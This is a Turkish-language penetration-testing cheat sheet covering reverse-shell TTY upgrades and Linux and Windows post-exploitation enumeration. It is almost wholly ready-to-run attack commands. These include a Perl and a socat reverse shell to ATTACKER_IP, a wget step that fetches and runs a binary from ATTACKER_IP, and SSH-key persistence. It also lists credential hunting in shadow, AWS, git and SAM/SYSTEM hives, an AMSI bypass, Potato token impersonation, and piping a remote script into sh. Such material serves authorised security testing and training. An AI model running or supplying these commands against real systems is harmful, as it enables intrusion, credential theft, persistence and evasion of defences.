Pentest Cheat Sheet: TTY Upgrade & Enumeration
TTY Shell Upgrade
Neden TTY Upgrade Gerekli?
Reverse shell aldığında genellikle “dumb shell” alırsın. Bu shell’de:
- Tab completion çalışmaz
- Yukarı ok ile önceki komutlara erişemezsin
- Ctrl+C yapınca shell ölür
- nano, vim gibi interaktif programlar çalışmaz
- Bazı komutlar “no tty” hatası verir
Python ile TTY Upgrade (En Yaygın)
# Python 3
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Python 2
python -c 'import pty;pty.spawn("/bin/bash")'
# Hangisi varsa
python -c 'import pty;pty.spawn("/bin/bash")' 2>/dev/null || python3 -c 'import pty;pty.spawn("/bin/bash")'
Full Interactive TTY (En İyi Yöntem)
# 1. Önce PTY spawn et
python3 -c 'import pty;pty.spawn("/bin/bash")'
# 2. Ctrl+Z ile background'a al
# [Ctrl+Z]
# 3. Kendi terminalinde şunu yaz
stty raw -echo; fg
# 4. Enter'a iki kez bas, sonra:
export TERM=xterm-256color
export SHELL=/bin/bash
# 5. Terminal boyutunu ayarla (kendi terminalinde `stty size` ile öğren)
stty rows 40 cols 160
Script Komutu ile Upgrade
# /bin/bash yoksa
script /dev/null -c bash
# Alternatif
script -qc /bin/bash /dev/null
Diğer Diller ile TTY Spawn
# Perl
perl -e 'exec "/bin/bash";'
perl -e 'use Socket;$i="ATTACKER_IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
# Ruby
ruby -e 'exec "/bin/bash"'
# Lua
lua -e "os.execute('/bin/bash')"
# IRB (Ruby)
exec "/bin/bash"
# vi/vim içinden
:!bash
:set shell=/bin/bash
:shell
# nmap (eski versiyonlar)
nmap --interactive
!sh
# awk
awk 'BEGIN {system("/bin/bash")}'
# find
find / -exec /bin/bash \; -quit
# expect
expect -c 'spawn bash; interact'
Socat ile Full TTY (En Temizi)
# Attacker makinede listener
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Target makinede (socat varsa)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444
# Socat yoksa, transfer et
wget -q http://ATTACKER_IP/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444
rlwrap ile Upgrade (Attacker Tarafı)
# Listener başlatırken rlwrap kullan
rlwrap nc -lvnp 4444
# Bu sayede ok tuşları ve history çalışır
SSH Key ile Kalıcı Erişim
# Kendi public key'ini hedefin authorized_keys dosyasına ekle
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
# Artık SSH ile bağlanabilirsin
ssh user@target
Linux Enumeration
Sistem Bilgisi
# Temel bilgiler
hostname
uname -a
cat /etc/os-release
cat /etc/issue
cat /proc/version
lsb_release -a
# Kernel versiyonu (exploit aramak için)
uname -r
# Architecture
arch
uname -m
# Uptime ve load
uptime
cat /proc/loadavg
Kullanıcı Bilgileri
# Mevcut kullanıcı
whoami
id
groups
# Tüm kullanıcılar
cat /etc/passwd
cat /etc/passwd | grep -E "sh$" # Shell'i olanlar
cat /etc/passwd | cut -d: -f1 # Sadece kullanıcı adları
# Gruplar
cat /etc/group
# Sudo yetkileri
sudo -l
cat /etc/sudoers 2>/dev/null
cat /etc/sudoers.d/* 2>/dev/null
# Login history
last
lastlog
w
who
# Şu an bağlı kullanıcılar
users
Şifre ve Credential Hunting
# Shadow dosyası (root gerekir)
cat /etc/shadow
# History dosyaları
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
cat ~/.nano_history
history
# Tüm history dosyaları
find / -name "*history*" 2>/dev/null
# Config dosyalarında şifre arama
grep -r "password" /etc/ 2>/dev/null
grep -r "pass" /var/www/ 2>/dev/null
grep -r "pwd" /opt/ 2>/dev/null
grep -ri "password" --include="*.php" /var/www/ 2>/dev/null
grep -ri "password" --include="*.conf" /etc/ 2>/dev/null
grep -ri "password" --include="*.xml" / 2>/dev/null
# SSH keyleri
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "id_ecdsa" 2>/dev/null
find / -name "id_ed25519" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
ls -la ~/.ssh/
# AWS credentials
cat ~/.aws/credentials
cat ~/.aws/config
# Docker
cat ~/.docker/config.json
# Git credentials
cat ~/.git-credentials
find / -name ".git" -type d 2>/dev/null
# Database credentials
cat /var/www/html/wp-config.php 2>/dev/null
cat /var/www/html/configuration.php 2>/dev/null
find / -name "*.sql" 2>/dev/null
find / -name "config.php" 2>/dev/null
find / -name "db.php" 2>/dev/null
find / -name "database.yml" 2>/dev/null
SUID/SGID Binaries
# SUID dosyaları (PrivEsc için kritik!)
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# SGID dosyaları
find / -perm -2000 -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
# Her ikisi de
find / -perm -6000 -type f 2>/dev/null
# GTFOBins'de kontrol edilecek yaygın SUID'ler
# vim, nano, find, bash, nmap, python, perl, ruby, awk, less, more, man, ftp, socat...
Capabilities
# Capability'leri listele
getcap -r / 2>/dev/null
# Önemli capability'ler:
# cap_setuid - UID değiştirebilir (root olabilir!)
# cap_net_raw - Raw socket açabilir
# cap_dac_override - File permission bypass
# cap_dac_read_search - Her şeyi okuyabilir
Cron Jobs
# Sistem cron'ları
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /etc/cron.weekly/
ls -la /etc/cron.monthly/
# Kullanıcı cron'ları
crontab -l
cat /var/spool/cron/crontabs/*
# Systemd timers
systemctl list-timers --all
# Çalışan cron process'leri izle
watch -n 1 'ps aux | grep -v "grep" | grep cron'
# Pspy kullan (process monitor)
./pspy64
Network Bilgileri
# IP adresleri
ip a
ifconfig
hostname -I
# Routing
ip route
route -n
netstat -rn
# Açık portlar ve bağlantılar
netstat -tulpn
netstat -antup
ss -tulpn
ss -antup
# Dinleyen servisler
lsof -i -P -n
# ARP tablosu
arp -a
ip neigh
# DNS
cat /etc/resolv.conf
cat /etc/hosts
# Firewall kuralları
iptables -L -n
iptables -S
cat /etc/iptables/rules.v4
ufw status
Process ve Servisler
# Çalışan process'ler
ps aux
ps -ef
ps auxwww
top
htop
# Belirli process ara
ps aux | grep -i "root"
ps aux | grep -i "mysql"
# Process ağacı
pstree
# Servisler
systemctl list-units --type=service
systemctl list-units --type=service --state=running
service --status-all
# Port dinleyen process'ler
lsof -i :80
lsof -i :443
fuser 80/tcp
Dosya Sistemi
# Mount'lar
mount
df -h
cat /etc/fstab
# Yazılabilir dizinler
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
# World-writable dosyalar
find / -perm -2 -type f 2>/dev/null
find / -type f -perm -o+w 2>/dev/null
# Belirli kullanıcıya ait dosyalar
find / -user root -perm -4000 2>/dev/null
find / -user www-data 2>/dev/null
# Son değiştirilen dosyalar
find / -mmin -10 2>/dev/null # Son 10 dakika
find / -mtime -1 2>/dev/null # Son 1 gün
# Büyük dosyalar
find / -size +100M -type f 2>/dev/null
# Gizli dosyalar
find / -name ".*" -type f 2>/dev/null
# Backup dosyaları
find / -name "*.bak" 2>/dev/null
find / -name "*.old" 2>/dev/null
find / -name "*.backup" 2>/dev/null
find / -name "*~" 2>/dev/null
Yüklü Yazılımlar
# Debian/Ubuntu
dpkg -l
apt list --installed
# RHEL/CentOS
rpm -qa
yum list installed
# Arch
pacman -Q
# Manuel kontrol
which python python3 perl ruby gcc nc ncat netcat wget curl nmap
ls /usr/bin/ | head -50
ls /usr/local/bin/
Container/Virtualization
# Docker içinde miyiz?
cat /proc/1/cgroup | grep docker
ls -la /.dockerenv
hostname # Rastgele karakter dizisi genelde container
# Docker socket erişimi (PrivEsc!)
ls -la /var/run/docker.sock
# LXC/LXD
cat /proc/1/cgroup | grep lxc
# Kubernetes
ls -la /var/run/secrets/kubernetes.io/
env | grep -i kube
Otomatik Enumeration Araçları
# LinPEAS (en kapsamlı) — script'i doğrudan sh'a pipe'lamak yerine önce diske indirip incelemek daha güvenlidir
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# Linux Smart Enumeration
./lse.sh -l 1
# Unix-privesc-check
./unix-privesc-check standard
# Linenum
./linenum.sh
Windows Enumeration
Sistem Bilgisi
# Temel bilgiler
systeminfo
hostname
whoami
# OS versiyonu
ver
wmic os get caption,version,buildnumber
# Hotfix'ler (eksik patch = exploit!)
wmic qfe list
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Architecture
echo %PROCESSOR_ARCHITECTURE%
[Environment]::Is64BitOperatingSystem
Kullanıcı Bilgileri
# Mevcut kullanıcı
whoami
whoami /all
whoami /priv # Privilege'lar (kritik!)
whoami /groups
# Tüm kullanıcılar
net user
net user administrator
Get-LocalUser
# Gruplar
net localgroup
net localgroup administrators
Get-LocalGroup
Get-LocalGroupMember Administrators
# Domain bilgisi
net user /domain
net group /domain
net group "Domain Admins" /domain
# Aktif oturumlar
query user
qwinsta
Privilege Escalation İçin Kritik Privilege’lar
# Bunları gördüğünde sevin:
# SeImpersonatePrivilege → Potato attacks
# SeAssignPrimaryToken → Potato attacks
# SeBackupPrivilege → Dosya okuma
# SeRestorePrivilege → Dosya yazma
# SeTakeOwnershipPrivilege → Ownership alma
# SeDebugPrivilege → Process memory erişimi
# SeLoadDriverPrivilege → Driver yükleme
whoami /priv
Şifre ve Credential Hunting
# SAM ve SYSTEM (hash dump için)
reg save hklm\sam c:\sam
reg save hklm\system c:\system
# Unattend.xml (kurulum şifreleri)
dir /s *unattend.xml 2>nul
dir /s *sysprep.xml 2>nul
dir /s *unattended.xml 2>nul
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\Windows\Panther\Unattend\Unattend.xml
type C:\Windows\System32\Sysprep\Unattend.xml
# GPP (Group Policy Preferences) şifreleri
dir /s Groups.xml 2>nul
findstr /si password \\dc\SYSVOL\*.xml
# Registry'de şifre arama
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
# Dosyalarda şifre arama
findstr /si password *.txt *.ini *.config *.xml
findstr /spin "password" *.*
dir /s *pass* == *cred* == *vnc* == *.config*
# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Get-History
(Get-PSReadlineOption).HistorySavePath
# Saved credentials
cmdkey /list
vaultcmd /list
# DPAPI credentials
dir /a:h C:\Users\*\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\*\AppData\Roaming\Microsoft\Credentials\
# WiFi şifreleri
netsh wlan show profiles
netsh wlan show profile name="SSID" key=clear
# IIS config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
type C:\inetpub\wwwroot\web.config
# Putty sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Servisler ve Zafiyetler
# Tüm servisler
sc query
wmic service list brief
Get-Service
Get-WmiObject win32_service | select Name,State,PathName
# Unquoted service paths (klasik PrivEsc!)
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"
Get-WmiObject win32_service | select Name,PathName | Where-Object {$_.PathName -notlike "C:\Windows\*" -and $_.PathName -notlike '"*'}
# Service permissions (accesschk.exe ile)
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# Servis binary permissions
icacls "C:\Program Files\Service\binary.exe"
# Scheduled tasks
schtasks /query /fo LIST /v
schtasks /query /fo TABLE
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Network Bilgileri
# IP configuration
ipconfig /all
Get-NetIPConfiguration
# Routing
route print
netstat -rn
# Açık portlar
netstat -ano
netstat -anob # Process ismiyle
Get-NetTCPConnection | where {$_.State -eq "Listen"}
# ARP tablosu
arp -a
# DNS cache
ipconfig /displaydns
# Shares
net share
wmic share list
Get-SmbShare
# Network shares erişimi
net view \\127.0.0.1
net view \\dc01
# Firewall
netsh firewall show state
netsh firewall show config
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all
# Hosts file
type C:\Windows\System32\drivers\etc\hosts
Process ve Uygulamalar
# Çalışan process'ler
tasklist
tasklist /svc
tasklist /v
Get-Process
wmic process list full
# Process'leri detaylı listele
wmic process get name,processid,executablepath
Get-WmiObject Win32_Process | select Name,ProcessId,CommandLine
# Yüklü programlar
wmic product get name,version
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | select DisplayName, DisplayVersion
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | select DisplayName, DisplayVersion
# Startup programları
wmic startup list full
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Dosya Sistemi
# Yazılabilir dizinler
accesschk.exe -uwdqs Users c:\ /accepteula
accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula
# İlginç dosyalar
dir /s *pass* == *cred* == *vnc* == *.config 2>nul
dir /s /b *.log 2>nul
dir /a /s /b c:\*.kdbx 2>nul # KeePass
# AlwaysInstallElevated (MSI ile PrivEsc)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Yazılabilir PATH dizinleri
echo %PATH%
for %A in ("%path:;=";"%") do @echo %~A
Token ve Impersonation
# Token bilgisi
whoami /priv
# Incognito ile token listele (meterpreter)
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
# PrintSpoofer (SeImpersonatePrivilege varsa)
PrintSpoofer.exe -i -c cmd
# JuicyPotato / RoguePotato / SweetPotato
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *
Antivirus ve Güvenlik
# Windows Defender
sc query windefend
Get-MpComputerStatus
Get-MpPreference | select -ExpandProperty ExclusionPath
# Tüm AV'ler
wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayname,productstate
# AppLocker
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
# AMSI bypass (PowerShell)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Otomatik Enumeration Araçları
# WinPEAS
.\winPEASany.exe
# PowerUp
. .\PowerUp.ps1
Invoke-AllChecks
# Sherlock (eski ama etkili)
. .\Sherlock.ps1
Find-AllVulns
# JAWS
.\jaws-enum.ps1
# Seatbelt
.\Seatbelt.exe -group=all
# Watson (missing patches)
.\Watson.exe
Hızlı PrivEsc Kontrol Listesi
# 1. Privilege'ları kontrol et
whoami /priv
# SeImpersonate/SeAssignPrimaryToken → Potato
# 2. Unquoted service paths
wmic service get name,pathname | findstr /i /v "C:\Windows"
# 3. AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# 4. Stored credentials
cmdkey /list
# 5. Scheduled tasks
schtasks /query /fo LIST /v | findstr /i "Task To Run"
# 6. Yazılabilir servis binary'leri
accesschk.exe -uwcqv "Users" *
# 7. Registry autorun
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Faydalı Kaynaklar
- GTFOBins: https://gtfobins.github.io/ (Linux SUID/capability exploit)
- LOLBAS: https://lolbas-project.github.io/ (Windows living-off-the-land)
- HackTricks: https://book.hacktricks.xyz/
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings
- PEASS-ng: https://github.com/carlospolop/PEASS-ng (LinPEAS/WinPEAS)